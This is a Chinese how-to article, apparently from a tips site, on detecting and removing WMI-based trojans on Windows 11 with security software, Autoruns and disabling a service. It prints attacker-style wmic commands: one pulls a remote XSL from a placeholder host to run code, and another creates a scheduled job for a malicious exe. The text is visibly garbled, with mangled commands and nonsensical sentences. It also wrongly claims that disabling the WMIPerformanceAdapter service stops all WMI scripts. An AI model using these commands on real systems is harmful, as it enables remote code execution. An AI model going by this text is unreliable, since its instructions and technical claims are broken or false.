Win11怎么彻查WMI木马？在windows11系统中，WMI是一个非常核心的功能。该功能可用于脚本部署、过程枚举、监控目录修改等。但是，总有一些恶意的人植入了木马病毒。WMI植入木马病毒时，由于其特殊性，会对我们的系统造成极大的损害。下面小编就为大家带来了彻查的方法，快来看看吧。

如上所述，WMI功能丰富。对黑客而言，他们可以使用命令来完成许多操作。举例来说，在获得相应的权限之后，使用目标计算机。wmicosget/FORMAT:"http://www.xxxx.com:80/123.通过从网站服务器下载所需的恶意软件，可以实现123命令。.xsl(图1)。

当然，在实际操作中，这些恶意软件也可以使用WMI进行更多的操作，比如使用wmicjobcallcreate"123.exe",0,0,true,false,********154800.000+480命令创建任务计划在后台运行，甚至执行系统服务创建、DLL文件注入系统流程等操作。因为系统命令在这里使用(wmic.exe)，与传统的木马和病毒不同，它们不是由本体执行的，所以它们被称为无文件(严格来说，它们是由WMI脚本运行的，脚本被触发后，它们是通过下载木马运行的)。例如，臭名昭著的KingMiner挖掘木马通过WMI事件订阅不断触发木马在后台运行。

●火速链接：

在2018年第六期文章中，《解决WMI进程资源占用问题》介绍了WMI的相关知识。

发现并识别WMI恶意软件

WMI木马的一个重要特点是通过WMI脚本下载或激活木马运行。例如，当WMI挖掘木马感染计算机时，系统会生成任务计划，任务将连接到服务器，并在后台下载挖掘木马。挖掘木马后，系统会占用大量的资源和带宽，导致Windows在日常使用中运行缓慢，网页打开缓慢，电脑的硬盘指示灯一直在闪烁(因为木马会在后台不断读取数据)。如果您的计算机在使用过程中出现上述异常现象，您需要使用安全软件进行检查。

Windows10用户可以使用系统自带的安全中心进行杀戮。若问题无法解决，可使用一些木马杀戮软件，如火绒恶性木马杀戮工具。(httPS://bbs.huorong.cn/thread-18575-1-1.html)启动软件后点击立即扫描进行查杀，一般木马(包括WMI木马)可以自动查杀(图2)。

但是如果你赢了WMI木马，安全软件只会删除WMI脚本下载的木马文件，但是WMI木马文件的下载模式不能完全切断。比如上面提到的WMI挖掘木马使用任务计划下载。因为任务计划中没有恶意软件，所以安全软件不会被删除，所以每次重启系统扫描后，总会发现木马文件，所以很有可能会被WMI木马击中。此时，有必要检查系统的启动项目，看看是否有异常启动项目。

系统启动项检查可以通过Autoruns完成。(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns)，启动程序后，它会自动检测机器的所有启动项目，包括计划任务、服务、WMI等(图3)。

例如，当作者公司的计算机安全扫描时，发现木马文件无法完全删除。机器运行Autoruns后，切换到计划任务，后台的所有任务计划都可以在打开的窗口看到。对于没有数字签名的任务，程序会用浅红色标记，机器里可以看到一个叫lsmosee"这一任务令人怀疑，它在该机的临时目录中加载了一份VBS文件(图4)。

选上图lsmosee，然后右击，选择跳转到文件夹。根据图片中镜像路径的提示，在打开的文件夹中使用记事本打开54236。.vbs文件显示了WMI脚本的一些内容，其功能是定期在后台下载木马文件。现在按照提示删除。然后回到上图，选择lsmosee单击删除任务，从而切断木马的下载通道。最后，再次使用火绒安全软件扫描计算机。删除其他有毒文件后，问题成功解决(图5)。

一劳永逸地下载WMI木马。

WMI木马之所以很难杀死，是因为它的下载方式是通过WMI脚本实现的，而WMI脚本的激活方式有很多(比如上面的例子是任务计划，有些是在使用过程中注入的。)，但WMI脚本的运行取决于WMIPerformanceAdapter服务，因此，对于个人用户来说，可以通过停止服务来禁止WMI脚本的运行。在桌面任务栏的搜索框中输入服务，打开服务管理部件后找到上述服务，双击打开后停止，并将其启动类型设置为禁用，使机器的所有WMI脚本无法运行(图6)。

注意：

禁止使用WMI服务可能会导致某些网络服务无法使用。若计算机使用受到禁用服务的影响，请及时恢复。

上面就是小编带来的Win11怎么彻查WMI木马的方法介绍，大家快去试试吧。海外IDC网还有许多软件操作方法和测评信息，快来关注我们吧，精彩不容错过。

【感谢龙石数据为本站数据中台建设方案 http://www.longshidata.com/pages/government.html，感恩 】